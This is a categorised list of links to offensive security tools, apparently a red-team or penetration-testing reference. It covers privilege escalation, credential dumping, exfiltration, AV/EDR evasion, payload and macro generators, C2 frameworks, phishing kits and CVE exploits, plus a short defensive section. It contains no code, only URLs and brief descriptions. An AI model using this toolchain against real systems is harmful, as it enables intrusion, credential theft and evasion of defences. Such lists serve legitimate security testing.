Web Exploitation Tools https://github.com/OsandaMalith/LFiFreak - lfi https://github.com/enjoiz/XXEinjector - xxe https://github.com/tennc/webshell - shellz https://github.com/flozz/p0wny-shell https://github.com/epinna/tplmap - ssti https://github.com/orf/xcat - xpath injection https://github.com/almandin/fuxploider - File Uploads https://github.com/nccgroup/freddy - deserialization https://github.com/irsdl/IIS-ShortName-Scanner - IIS Short Filename Vuln. exploitation https://github.com/frohoff/ysoserial - Deserialize Java Exploitation https://github.com/pwntester/ysoserial.net - Deserialize .NET Exploitation https://github.com/internetwache/GitTools - Exploit .git Folder Existence https://github.com/cujanovic/SSRF-Testing - SSRF Tutorials https://github.com/ambionics/phpggc - PHP Unserialize Payload generator https://github.com/BuffaloWill/oxml_xxe - Malicious Office XXE payload generator https://github.com/tijme/angularjs-csti-scanner - Angularjs Csti Scanner https://github.com/0xacb/viewgen - Deserialize .NET Viewstates https://github.com/Illuminopi/RCEvil.NET - Deserialize .NET Viewstates REST API Audit https://github.com/flipkart-incubator/Astra Swagger File API Attack https://github.com/imperva/automatic-api-attack-tool Windows Privilege Escalation / Audit https://github.com/itm4n/PrivescCheck - Privilege Escalation Enumeration Script for Windows https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS - powerfull Privilege Escalation Check Script with nice output https://github.com/AlessandroZ/BeRoot https://github.com/rasta-mouse/Sherlock https://github.com/hfiref0x/UACME - UAC https://github.com/rootm0s/WinPwnage - UAC https://github.com/abatchy17/WindowsExploits https://github.com/dafthack/HostRecon https://github.com/sensepost/rattler - find vulnerable dlls for preloading attack https://github.com/WindowsExploits/Exploits https://github.com/Cybereason/siofra - dll hijack scanner 
https://github.com/0xbadjuju/Tokenvator - admin to system https://github.com/MojtabaTajik/Robber https://github.com/411Hall/JAWS https://github.com/GhostPack/SharpUp https://github.com/GhostPack/Seatbelt https://github.com/A-mIn3/WINspect https://github.com/hausec/ADAPE-Script https://github.com/SecWiki/windows-kernel-exploits https://github.com/bitsadmin/wesng https://github.com/rasta-mouse/Watson Windows Privilege Abuse (Privilege Escalation) https://github.com/gtworek/Priv2Admin - Abuse Windows Privileges https://github.com/itm4n/UsoDllLoader - load malicious dlls from system32 https://github.com/TsukiCTF/Lovely-Potato - Exploit potatoes with automation https://github.com/antonioCoco/RogueWinRM - from Service Account to System https://github.com/antonioCoco/RoguePotato - Another Windows Local Privilege Escalation from Service Account to System https://github.com/itm4n/PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019 https://github.com/BeichenDream/BadPotato - itm4ns Printspoofer in C# https://github.com/itm4n/FullPowers - Recover the default privilege set of a LOCAL/NETWORK SERVICE account T3 Enumeration https://github.com/quentinhardy/jndiat Linux Privilege Escalation / Audit https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS - powerfull Privilege Escalation Check Script with nice output https://github.com/mzet-/linux-exploit-suggester https://github.com/rebootuser/LinEnum https://github.com/diego-treitos/linux-smart-enumeration https://github.com/CISOfy/lynis https://github.com/AlessandroZ/BeRoot https://github.com/future-architect/vuls https://github.com/ngalongc/AutoLocalPrivilegeEscalation https://github.com/b3rito/yodo https://github.com/belane/linux-soft-exploit-suggester - lookup vulnerable installed software https://github.com/sevagas/swap_digger https://github.com/NullArray/RootHelper https://github.com/NullArray/MIDA-Multitool https://github.com/initstring/dirty_sock 
https://github.com/jondonas/linux-exploit-suggester-2 https://github.com/sosdave/KeyTabExtract https://github.com/DominicBreuker/pspy https://github.com/itsKindred/modDetective https://github.com/nongiach/sudo_inject https://github.com/Anon-Exploiter/SUID3NUM - find suid bins and look them up under gtfobins / exploitable or not https://github.com/nccgroup/GTFOBLookup - Offline GTFOBins https://github.com/TH3xACE/SUDO_KILLER - sudo misconfiguration exploitation https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py https://github.com/inquisb/unix-privesc-check https://github.com/hc0d3r/tas - easily manipulate the tty and create fake binaries https://github.com/SecWiki/linux-kernel-exploits https://github.com/initstring/uptux https://github.com/andrew-d/static-binaries - not really privesc but helpfull Exfiltration Credential harvesting Windows Specific https://github.com/gentilkiwi/mimikatz https://github.com/GhostPack/SafetyKatz https://github.com/Flangvik/BetterSafetyKatz - Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory. https://github.com/GhostPack/Rubeus https://github.com/Arvanaghi/SessionGopher https://github.com/peewpw/Invoke-WCMDump https://github.com/tiagorlampert/sAINT https://github.com/AlessandroZ/LaZagneForensic - remote lazagne https://github.com/eladshamir/Internal-Monologue https://github.com/djhohnstein/SharpWeb - Browser Creds gathering https://github.com/moonD4rk/HackBrowserData - hack-browser-data is an open-source tool that could help you decrypt data[passwords|bookmarks|cookies|history] from the browser. 
https://github.com/mwrlabs/SharpClipHistory - ClipHistory feature get the last 25 copy paste actions https://github.com/outflanknl/Dumpert - dump lsass using direct system calls and API unhooking https://github.com/b4rtik/SharpMiniDump - Create a minidump of the LSASS process from memory - using Dumpert https://github.com/b4rtik/ATPMiniDump - Evade WinDefender ATP credential-theft https://github.com/aas-n/spraykatz - remote procdump.exe, copy dump file to local system and pypykatz for analysis/extraction https://github.com/0x09AL/RdpThief - extract live rdp logins https://github.com/chrismaddalena/SharpCloud - Simple C# for checking for the existence of credential files related to AWS, Microsoft Azure, and Google Compute. https://github.com/djhohnstein/SharpChromium - .NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins. LSASS Dump Without Mimikatz https://github.com/Hackndo/lsassy https://github.com/aas-n/spraykatz Credential harvesting Linux Specific https://github.com/huntergregal/mimipenguin https://github.com/n1nj4sec/mimipy https://github.com/dirtycow/dirtycow.github.io https://github.com/mthbernardes/sshLooterC - SSH Credential loot https://github.com/blendin/3snake - SSH / Sudo / SU Credential loot https://github.com/0xmitsurugi/gimmecredz Data Exfiltration - DNS/ICMP/Wifi Exfiltration https://github.com/FortyNorthSecurity/Egress-Assess https://github.com/p3nt4/Invoke-TmpDavFS https://github.com/DhavalKapil/icmptunnel https://github.com/iagox86/dnscat2 https://github.com/Arno0x/DNSExfiltrator https://github.com/spieglt/FlyingCarpet - Wifi Exfiltration https://github.com/SECFORCE/Tunna - Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP https://github.com/sysdream/chashell https://github.com/no0be/DNSlivery - Easy files and payloads delivery over DNS Git Specific https://github.com/dxa4481/truffleHog https://github.com/zricethezav/gitleaks https://github.com/adamtlangley/gitscraper Windows 
/ Linux https://github.com/AlessandroZ/LaZagne https://github.com/Dionach/PassHunt https://github.com/vulmon/Vulmap Reverse Engineering / decompiler https://github.com/mattifestation/PowerShellArsenal https://github.com/0xd4d/dnSpy - .NET Disassembler https://github.com/NationalSecurityAgency/ghidra https://github.com/icsharpcode/ILSpy Forensics https://github.com/Invoke-IR/PowerForensics https://github.com/Neo23x0/Loki https://github.com/gfoss/PSRecon Network Attacks https://github.com/bettercap/bettercap - https://github.com/SpiderLabs/Responder https://github.com/lgandx/Responder - more up to date https://github.com/evilsocket/bettercap - Deprecated but still good https://github.com/r00t-3xp10it/morpheus https://github.com/fox-it/mitm6 https://github.com/Kevin-Robertson/InveighZero - mitm6 in C# + Inveigh default features https://github.com/DanMcInerney/LANs.py Specific MITM service Exploitation https://github.com/jtesta/ssh-mitm - SSH https://github.com/pimps/wsuxploit - WSUS https://github.com/SySS-Research/Seth - RDP https://github.com/GoSecure/pyrdp - RDP man-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact https://github.com/infobyte/evilgrade - Fake Updates for various Software https://github.com/samdenty/injectify - web application live recording, keystroke logger https://github.com/skorov/ridrelay - User Enumeration with SMB Relay Attacks https://github.com/Kevin-Robertson/Invoke-TheHash Sniffing / Evaluation / Filtering https://github.com/DanMcInerney/net-creds https://github.com/odedshimon/BruteShark - https://github.com/lgandx/PCredz https://github.com/Srinivas11789/PcapXray Red-Team SIEM https://github.com/outflanknl/RedELK - Red Team's SIEM - tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations. 
Scanner / Exploitation-Frameworks / Automation https://github.com/threat9/routersploit https://github.com/nccgroup/autopwn https://github.com/1N3/Sn1per https://github.com/byt3bl33d3r/CrackMapExec https://github.com/Cn33liz/p0wnedShell https://github.com/archerysec/archerysec https://github.com/vulnersCom/nmap-vulners https://github.com/m4ll0k/AutoNSE - automate nmap with scripting capabilities https://github.com/v3n0m-Scanner/V3n0M-Scanner https://github.com/zdresearch/OWASP-Nettacker Default Credential Scanner https://github.com/ztgrace/changeme https://github.com/InfosecMatter/default-http-login-hunter - Login hunter of default credentials for administrative web interfaces leveraging NNdefaccts dataset. https://github.com/FortyNorthSecurity/EyeWitness https://github.com/byt3bl33d3r/WitnessMe - screenshot for webservers Default Credential Lookup https://github.com/Viralmaniar/Passhunt Payload Generation / AV-Evasion / Malware Creation https://github.com/nccgroup/Winpayloads https://github.com/Screetsec/TheFatRat https://github.com/xillwillx/tricky.lnk https://github.com/trustedsec/unicorn https://github.com/z0noxz/powerstager https://github.com/curi0usJack/luckystrike https://github.com/enigma0x3/Generate-Macro https://github.com/Cn33liz/JSMeter https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator https://github.com/Cn33liz/StarFighters https://github.com/BorjaMerino/Pazuzu https://github.com/mwrlabs/wePWNise https://github.com/Mr-Un1k0d3r/UniByAv https://github.com/govolution/avet https://github.com/Pepitoh/VBad https://github.com/mdsecactivebreach/CACTUSTORCH https://github.com/D4Vinci/Dr0p1t-Framework https://github.com/g0tmi1k/msfpc https://github.com/bhdresh/CVE-2017-0199 - Office RCE POC https://github.com/GreatSCT/GreatSCT https://github.com/mthbernardes/rsg - reverse shell generator https://github.com/sevagas/macro_pack https://github.com/mdsecactivebreach/SharpShooter https://github.com/hlldz/SpookFlare 
https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads https://github.com/paranoidninja/CarbonCopy - Sign an executable for AV-Evasion https://github.com/peewpw/Invoke-PSImage https://github.com/Arvanaghi/CheckPlease - Sandbox Evasion techniques https://github.com/trustedsec/nps_payload https://github.com/stormshadow07/HackTheWorld https://github.com/r00t-3xp10it/FakeImageExploiter https://github.com/nccgroup/demiguise - Encrypted HTA Generation https://github.com/med0x2e/genxlm https://github.com/med0x2e/GadgetToJScript https://github.com/rasta-mouse/GadgetToJScript - Optimized GadgetToJScript version https://github.com/EgeBalci/sgn - Shikata ga nai (仕方がない) encoder ported into go with several improvements https://github.com/matterpreter/spotter - Spotter is a tool to wrap payloads in environmentally-keyed, AES256-encrypted launchers. https://github.com/s0lst1c3/dropengine - Malleable payload generation framework. https://github.com/gigajew/PowerDropper - Build Powershell Script from .NET Executable https://github.com/FortyNorthSecurity/EXCELntDonut - Excel 4.0 (XLM) Macro Generator for injecting DLLs and EXEs into memory. https://github.com/Greenwolf/ntlm_theft - A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf) https://github.com/phackt/stager.dll - AES Encrypt payloads https://github.com/Arno0x/EmbedInHTML - Embed and hide any file in an HTML file https://github.com/bats3c/darkarmour - AES Encrypt C/C++ Compiled binaries and decrypt at runtime https://github.com/christophetd/spoofing-office-macro - PoC of a VBA macro spawning a process with a spoofed parent and command line. https://github.com/infosecn1nja/MaliciousMacroMSBuild - Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass. https://github.com/outflanknl/EvilClippy - A cross-platform assistant for creating malicious MS Office documents. 
Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows. Shellcode Injection https://github.com/TheWover/donut - Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters https://github.com/rasta-mouse/RuralBishop - D/Invoke port of UrbanBishop https://github.com/FuzzySecurity/Sharp-Suite/tree/master/UrbanBishop - Donut for Shellcode Injection https://github.com/antonioCoco/Mapping-Injection - Mapping injection is a process injection technique that avoids the usage of common monitored syscall VirtualAllocEx, WriteProcessMemory and CreateRemoteThread. https://github.com/SolomonSklash/SyscallPOC - Shellcode injection POC using syscalls. https://github.com/Arno0x/ShellcodeWrapper - Shellcode wrapper with encryption for multiple target languages https://github.com/Ne0nd0g/go-shellcode - A repository of Windows Shellcode runners and supporting utilities. The applications load and execute Shellcode using various API calls or techniques. 
https://github.com/djhohnstein/CSharpSetThreadContext - C# Shellcode Runner to execute shellcode via CreateRemoteThread and SetThreadContext to evade Get-InjectedThread https://github.com/pwndizzle/c-sharp-memory-injection - A set of scripts that demonstrate how to perform memory injection in C# EDR Evasion - Logging Evasion https://github.com/CCob/SharpBlock - A method of bypassing EDR's active projection DLL's by preventing entry point execution https://github.com/bats3c/Ghost-In-The-Logs - Evade sysmon and windows event logging https://github.com/am0nsec/SharpHellsGate - C# Implementation of the Hell's Gate VX Technique https://github.com/am0nsec/HellsGate - Original C Implementation of the Hell's Gate VX Technique https://github.com/3gstudent/Windows-EventLog-Bypass - C++ Version of Invoke-Phantom https://github.com/Soledge/BlockEtw - .Net Assembly to block ETW telemetry in current process https://github.com/ionescu007/faxhell - A Bind Shell Using the Fax Service and a DLL Hijack https://github.com/realoriginal/ppdump-public - Protected Process (Light) Dump: Uses Zemana AntiMalware Engine To Open a Privileged Handle to a PP/PPL Process And Inject MiniDumpWriteDump() Shellcode Useful Binary Modification tools https://github.com/hasherezade/exe_to_dll https://github.com/hasherezade/dll_to_exe https://github.com/hasherezade/pe_to_shellcode Android https://github.com/sensepost/kwetza External Penetration Testing Domain Finding / Subdomain Enumeration https://github.com/aboul3la/Sublist3r https://github.com/TheRook/subbrute https://github.com/michenriksen/aquatone https://github.com/darkoperator/dnsrecon https://github.com/fwaeytens/dnsenum https://github.com/s0md3v/Striker + Scanner https://github.com/leebaird/discover https://github.com/eldraco/domain_analyzer - more like an audit https://github.com/caffix/amass - https://github.com/subfinder/subfinder https://github.com/TypeError/domained https://github.com/SilverPoision/Rock-ON File Search / Metadata extraction 
https://github.com/dafthack/PowerMeta https://github.com/ElevenPaths/FOCA Scanner https://github.com/vesche/scanless https://github.com/1N3/Sn1per https://github.com/DanMcInerney/pentest-machine Email Gathering https://github.com/leapsecurity/InSpy https://github.com/dchrastil/ScrapedIn https://github.com/SimplySecurity/SimplyEmail https://github.com/clr2of8/GatherContacts https://github.com/s0md3v/Zen - Find Emails of Github Users https://github.com/m8r0wn/CrossLinked https://github.com/m4ll0k/Infoga Domain Auth + Exploitation https://github.com/nyxgeek/o365recon https://github.com/gremwell/o365enum - Enumerate valid usernames from Office 365 using ActiveSync, Autodiscover v1, or office.com login page. https://github.com/dafthack/MSOLSpray - A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled. 
https://github.com/sachinkamath/NTLMRecon - Tool to enumerate information from NTLM authentication enabled web endpoints https://github.com/ustayready/fireprox - rotate IP Adresses over AWS - Combine with MSOLSpray https://github.com/True-Demon/raindance - office 365 recon https://github.com/dafthack/MailSniper https://github.com/sensepost/ruler https://github.com/Greenwolf/Spray - lockout Time integrated https://github.com/nyxgeek/lyncsmash - Lync Credential Finder https://github.com/byt3bl33d3r/SprayingToolkit - Scripts to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient https://github.com/mdsecresearch/LyncSniper - Lync Credential Finder https://github.com/Ridter/cve-2020-0688 - OWA Deserialisation RCE https://github.com/3gstudent/easBrowseSharefile - Use to browse the share file by eas(Exchange Server ActiveSync) https://github.com/RedLectroid/OutlookSend - A C# tool to send emails through Outlook from the command line or in memory Specific Service Scanning / Exploitation Login Brute Force + Wordlist attacks https://github.com/galkan/crowbar - Brute force non hydra compliant services - RDP, VNC, OpenVPN https://github.com/1N3/BruteX - Brute Force various services https://github.com/x90skysn3k/brutespray - https://github.com/DarkCoderSc/win-brute-logon - Crack any Microsoft Windows users password without any privilege (Guest account included) https://github.com/lanjelot/patator https://github.com/dafthack/RDPSpray - RDP Password Spray - No Event Logs https://github.com/xFreed0m/RDPassSpray - Python3 tool to perform password spraying using RDP SNMP https://github.com/hatlord/snmpwn Open X11 https://github.com/sensepost/xrdp Printers https://github.com/RUB-NDS/PRET https://github.com/BusesCanFly/PRETty - Automation for PRET MSSQL https://github.com/quentinhardy/msdat Oracle https://github.com/quentinhardy/odat IKE https://github.com/SpiderLabs/ikeforce SMB Null Session Exploitation 
https://github.com/m8r0wn/nullinux iLO Exploitation https://github.com/airbus-seclab/ilo4_toolbox vmware vCenter Exploits https://github.com/guardicore/vmware_vcenter_cve_2020_3952 - Exploit for CVE-2020-3952 in vCenter 6.7 Intel AMT Exploitation https://github.com/Coalfire-Research/DeathMetal SAP Exploitation https://github.com/comaeio/OPCDE https://github.com/gelim/sap_ms https://github.com/chipik/SAP_GW_RCE_exploit Weblogic Exploitation https://github.com/quentinhardy/jndiat - WEblogic Server Tests https://github.com/kingkaki/weblogic-scan https://github.com/FlyfishSec/weblogic_rce - cve-2019-2725 https://github.com/SukaraLin/CVE-2019-2890 https://github.com/1337g/CVE-2017-10271 https://github.com/LandGrey/CVE-2018-2894 https://github.com/Y4er/CVE-2020-2551 Sharepoint exploitation https://github.com/sensepost/SPartan - Sharepoint Fingerprint + Exploitation https://github.com/Voulnet/desharialize Telerik UI for ASP.NET AJAX Exploit https://github.com/noperator/CVE-2019-18935 General Recon https://github.com/FortyNorthSecurity/EyeWitness Command & Control Frameworks https://github.com/n1nj4sec/pupy https://github.com/nettitude/PoshC2 https://github.com/FortyNorthSecurity/WMImplant https://github.com/quasar/QuasarRAT https://github.com/EmpireProject/Empire https://github.com/zerosum0x0/koadic https://github.com/Mr-Un1k0d3r/ThunderShell https://github.com/Ne0nd0g/merlin https://github.com/Arno0x/WebDavC2 https://github.com/malwaredllc/byob https://github.com/byt3bl33d3r/SILENTTRINITY https://github.com/Arno0x/WSC2 https://github.com/BC-SECURITY/Empire - Empire with embedded AMSI-Bypass https://github.com/cobbr/Covenant https://github.com/BishopFox/sliver - Implant framework https://github.com/bats3c/shad0w - A post exploitation framework designed to operate covertly on heavily monitored environments https://github.com/FSecureLABS/C3 - Custom Command and Control (C3). 
A framework for rapid prototyping of custom C2 channels, while still providing integration with existing offensive toolkits. Cobalt Strike Stuff https://github.com/DeEpinGh0st/Erebus https://github.com/aleenzz/Cobalt_Strike_wiki https://github.com/FortyNorthSecurity/C2concealer https://github.com/invokethreatguy/AggressorCollection https://github.com/harleyQu1nn/AggressorScripts Android https://github.com/AhMyth/AhMyth-Android-RAT Linux MacOSX Specific https://github.com/neoneggplant/EggShell Wifi Tools https://github.com/wifiphisher/wifiphisher https://github.com/P0cL4bs/WiFi-Pumpkin https://github.com/s0lst1c3/eaphammer https://github.com/h0nus/RogueSploit https://github.com/Tylous/SniffAir https://github.com/FluxionNetwork/fluxion https://github.com/derv82/wifite2 https://github.com/ICSec/airpwn-ng https://github.com/xdavidhu/mitmAP https://github.com/ZerBea/hcxdumptool Android / Nethunter https://github.com/faizann24/wifi-bruteforcer-fsecurify https://github.com/chrisk44/Hijacker Raspberri PI Exploitation https://github.com/secgroundzero/warberry https://github.com/samyk/poisontap https://github.com/mame82/P4wnP1 https://github.com/mame82/P4wnP1_aloa https://github.com/pi-hole/pi-hole Physical Security / HID/ETH Emulator https://github.com/carmaa/inception - PCI-based DMA https://github.com/samratashok/Kautilya https://github.com/ufrisk/pcileech - PCI based DMA https://github.com/Screetsec/Brutal - Teensy Payloads https://github.com/insecurityofthings/jackit https://github.com/BastilleResearch/mousejack Social Engeneering https://github.com/kgretzky/evilginx https://github.com/threatexpress/domainhunter https://github.com/netevert/dnsmorph - lookup valid phishing-Domains https://github.com/elceef/dnstwist - lookup valid phishing-Domains https://github.com/quickbreach/SMBetray - Change SMB Files on the fly https://github.com/SteveLTN/https-portal https://github.com/ryhanson/phishery https://github.com/Dviros/CredsLeaker 
https://github.com/bitsadmin/fakelogonscreen https://github.com/curtbraz/Phishing-API - Comprehensive Web Based Phishing Suite of Tools for Rapid Deployment and Real-Time Alerting! Defender Guides / Tools https://github.com/PaulSec/awesome-windows-domain-hardening https://github.com/ernw/hardening https://github.com/Invoke-IR/Uproot https://github.com/danielbohannon/Revoke-Obfuscation - powershell obfuscation detection https://github.com/countercept/python-exe-unpacker - python exe decompile https://github.com/0xd4d/de4dot - .NET Revoke-Obfuscation https://github.com/securitywithoutborders/hardentools https://github.com/x0rz/phishing_catcher https://github.com/Ben0xA/PowerShellDefense https://github.com/emposha/PHP-Shell-Detector https://github.com/LordNoteworthy/al-khaser https://github.com/Security-Onion-Solutions/security-onion - ids https://github.com/ptresearch/AttackDetection https://github.com/MHaggis/hunt-detect-prevent https://github.com/JPCERTCC/LogonTracer - Investigate malicious Windows logon by visualizing and analyzing Windows event log https://github.com/lithnet/ad-password-protection - AD Passwort Blacklisting https://github.com/R3MRUM/PSDecode - Powershell DE-Obfuscation https://github.com/matterpreter/DefenderCheck https://github.com/hegusung/AVSignSeek - Tool written in python3 to determine where the AV signature is located in a binary/payload https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES https://github.com/ION28/BLUESPAWN - An Active Defense and EDR software to empower Blue Teams https://github.com/hasherezade/hollows_hunter - Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches). https://github.com/hasherezade/pe-sieve - Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches). 
https://github.com/0Kee-Team/WatchAD - AD Security Intrusion Detection System https://github.com/nsacyber/Mitigating-Web-Shells https://github.com/redcanaryco/atomic-red-team - Small and highly portable detection tests based on MITRE's ATT&CK. Wordlists / Wordlist generators https://github.com/danielmiessler/SecLists https://github.com/berzerk0/Probable-Wordlists https://github.com/govolution/betterdefaultpasslist https://github.com/insidetrust/statistically-likely-usernames https://github.com/LandGrey/pydictor https://github.com/sc0tfree/mentalist https://github.com/skahwah/wordsmith https://github.com/1N3/IntruderPayloads https://github.com/fuzzdb-project/fuzzdb https://github.com/Bo0oM/fuzz.txt https://github.com/laconicwolf/Password-Scripts https://github.com/FlameOfIgnis/Pwdb-Public - A collection of all the data i could extract from 1 billion leaked credentials from internet. AD Lab Environment https://github.com/davidprowe/BadBlood Obfuscation https://github.com/xoreaxeaxeax/movfuscator https://github.com/danielbohannon/Invoke-DOSfuscation https://github.com/unixpickle/gobfuscate - GO Obfuscator https://github.com/javascript-obfuscator/javascript-obfuscator - Javascript Obfuscator https://github.com/danielbohannon/Invoke-Obfuscation - Powershell Obfuscator https://github.com/BinaryScary/NET-Obfuscate - .NET IL Obfuscator https://github.com/scrt/avcleaner - C/C++ source obfuscator for antivirus bypass https://github.com/meme/hellscape - GIMPLE obfuscator for C, C++, Go, ... all supported GCC targets and front-ends that use GIMPLE. https://github.com/mgeeky/VisualBasicObfuscator - VBS Obfuscator Hash Crack / Decryption https://hashcat.net/hashcat/ https://github.com/Ciphey/Ciphey - Ciphey is an automated decryption tool. Input encrypted text, get the decrypted text back. 
Source Code / Binary Analysis Binary Analysis https://github.com/avast/retdec https://github.com/MobSF/Mobile-Security-Framework-MobSF Source Code Analysis https://github.com/mre/awesome-static-analysis https://github.com/eslint/eslint - Javascript https://github.com/dpnishant/jsprime - Javascript https://github.com/phpstan/phpstan - PHP MISC https://github.com/pentestmonkey/gateway-finder https://github.com/Cybellum/DoubleAgent https://github.com/ytisf/theZoo https://github.com/kbandla/APTnotes https://github.com/WindowsLies/BlockWindows https://github.com/secrary/InjectProc https://github.com/AlsidOfficial/WSUSpendu https://github.com/SigPloiter/SigPloit https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist https://github.com/PowerShell/PowerShell https://github.com/landhb/HideProcess https://github.com/meliht/Mr.SIP https://github.com/XiphosResearch/exploits https://github.com/jas502n/CVE-2019-13272 https://github.com/fox-it/cve-2019-1040-scanner https://github.com/worawit/MS17-010 https://github.com/DiabloHorn/yara4pentesters https://github.com/D4Vinci/Cr3dOv3r https://github.com/a2u/CVE-2018-7600 - Drupal Exploit https://github.com/joxeankoret/CVE-2017-7494 - SAMBA Exploit https://github.com/D4Vinci/One-Lin3r - Reverse Shell Oneliner / Payload Generation https://github.com/0x00-0x00/ShellPop - Reverse/Bind Shell Generator https://github.com/Acceis/crypto_identifier https://github.com/sensepost/UserEnum - check if a user is valid in a domain https://github.com/LOLBAS-Project/LOLBAS - Living of the Land Binaries https://github.com/peewpw/Invoke-BSOD - Windows Denial of Service Exploit https://github.com/mtivadar/windows10_ntfs_crash_dos - Windows Denial of Service Exploit https://github.com/deepzec/Bad-Pdf PDF Steal NTLMv2 Hash Exploit - CVE-2018-4993 https://github.com/SecureAuthCorp/impacket - https://github.com/blacknbunny/libSSH-Authentication-Bypass - LibSSH Authentication Bypass vuln. 
https://github.com/OneLogicalMyth/zeroday-powershell - windows Privesc Exploit https://github.com/smicallef/spiderfoot - OSINT https://github.com/ShawnDEvans/smbmap https://github.com/Coalfire-Research/java-deserialization-exploits - Deserialisation Exploits https://github.com/RhinoSecurityLabs/GCPBucketBrute - S3 bucket tester https://github.com/khast3x/h8mail https://github.com/dirkjanm/adidnsdump - Zone transfer like for internal assessment https://github.com/gquere/pwn_jenkins https://github.com/JavelinNetworks/IR-Tools - Get-ShellContent.ps1 get the typed content for all open shells https://github.com/taviso/ctftool - windows CTF Exploitation https://github.com/jedisct1/dsvpn https://github.com/GoSecure/dtd-finder https://github.com/tyranid/DotNetToJScript https://github.com/cfreal/exploits - Apache Privilege Escalation https://github.com/adamdriscoll/snek - Execute python from powershell https://github.com/g0tmi1k/exe2hex Big-IP Exploitation https://github.com/jas502n/CVE-2020-5902 Azure Cloud Tools https://github.com/hausec/PowerZure https://github.com/NetSPI/MicroBurst https://github.com/dirkjanm/ROADtools - The Azure AD exploration framework. 
https://github.com/dafthack/CloudPentestCheatsheets

Anonymous / Tor Projects
https://github.com/realgam3/pymultitor
https://github.com/Und3rf10w/kali-anonsurf
https://github.com/GouveaHeitor/nipe
https://github.com/cryptolok/GhostInTheNet
https://github.com/DanMcInerney/elite-proxy-finder

Exploit Search
https://github.com/vulnersCom/getsploit
https://github.com/1N3/Findsploit

Industrial Control Systems
https://github.com/dark-lbp/isf
https://github.com/klsecservices/s7scan
https://github.com/w3h/isf

Network access control bypass
https://github.com/scipag/nac_bypass

JMX Exploitation
https://github.com/mogwailabs/mjet
https://github.com/siberas/sjet

Citrix Netscaler Pwn
https://github.com/trustedsec/cve-2019-19781

Red Team infrastructure setup
https://github.com/obscuritylabs/RAI
https://github.com/Coalfire-Research/Red-Baron - terraform cloud c2 redirector setup
https://github.com/qsecure-labs/overlord - Red Teaming Infrastructure Automation based on Red-Baron
https://github.com/rmikehodges/hideNsneak - This application assists in managing attack infrastructure for penetration testers by providing an interface to rapidly deploy, manage, and take down various cloud services. These include VMs, domain fronting, Cobalt Strike servers, API gateways, and firewalls.
https://github.com/shr3ddersec/Shr3dKit
https://github.com/t94j0/satellite

Bypass SPF/DKIM/DMARC
https://github.com/chenjj/espoofer

Redis Exploitation
https://github.com/Ridter/redis-rce

Apache Tomcat Exploitation
https://github.com/mgeeky/tomcatWarDeployer - Apache Tomcat auto WAR deployment & pwning penetration testing tool.
https://github.com/00theway/Ghostcat-CNVD-2020-10487 - AJP Exploit CVE-2020-1938

SSRF Exploitation
https://github.com/swisskyrepo/SSRFmap

LFI exploitation
https://github.com/mzfr/liffy

MongoDB / Redis / CouchDB Exploitation
https://github.com/torque59/Nosql-Exploitation-Framework

Elasticsearch / Kibana Exploitation
https://github.com/0xbug/Biu-framework

RMI attacks
https://github.com/NickstaDB/BaRMIe
https://github.com/BishopFox/rmiscout - RMIScout uses wordlist and bruteforce strategies to enumerate Java RMI functions and exploit RMI parameter unmarshalling vulnerabilities

JSON Web Token Analysis / Exploitation
https://github.com/ticarpi/jwt_tool

Docker Exploitation
https://github.com/AbsoZed/DockerPwn.py - automation of Docker TCP socket abuse
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/CVE%20Exploits/Docker%20API%20RCE.py - Docker API exposed RCE

PHP exploits
https://github.com/neex/phuip-fpizdam - nginx + php misconfiguration

Cloud attack tools
https://github.com/mdsecactivebreach/o365-attack-toolkit

Bluetooth / low energy
https://github.com/ojasookert/CVE-2017-0785
https://github.com/evilsocket/bleah
https://github.com/virtualabs/btlejack

Wireless / Radio Exploitation
https://github.com/mame82/LOGITacker

APT / Malware Emulation / Defense Check
https://github.com/TryCatchHCF/DumpsterFire
https://github.com/NextronSystems/APTSimulator
https://github.com/redhuntlabs/RedHunt-OS
https://github.com/guardicore/monkey

Hash Crack / Lookup
https://github.com/k4m4/dcipher-cli
https://github.com/s0md3v/Hash-Buster
https://github.com/initstring/passphrase-wordlist

OSCP Lists / tools / help
https://github.com/sailay1996/expl-bin
https://github.com/CyDefUnicorn/OSCP-Archives

ASPX Webshells
https://github.com/antonioCoco/SharPyShell

PHP Webshells
https://github.com/flozz/p0wny-shell
https://github.com/nil0x42/phpsploit - Stealth post-exploitation framework

JSP WebShells
https://github.com/SecurityRiskAdvisors/cmd.jsp

Other Tool-Lists / Cheat Sheets
https://github.com/Hack-with-Github/Awesome-Hacking
https://github.com/enaqx/awesome-pentest
https://github.com/HarmJ0y/CheatSheets
https://github.com/vysecurity/RedTips
https://github.com/toolswatch/blackhat-arsenal-tools
https://github.com/jivoi/awesome-osint
https://github.com/qazbnm456/awesome-cve-poc
https://github.com/swisskyrepo/PayloadsAllTheThings
https://github.com/dsasmblr/hacking-online-games
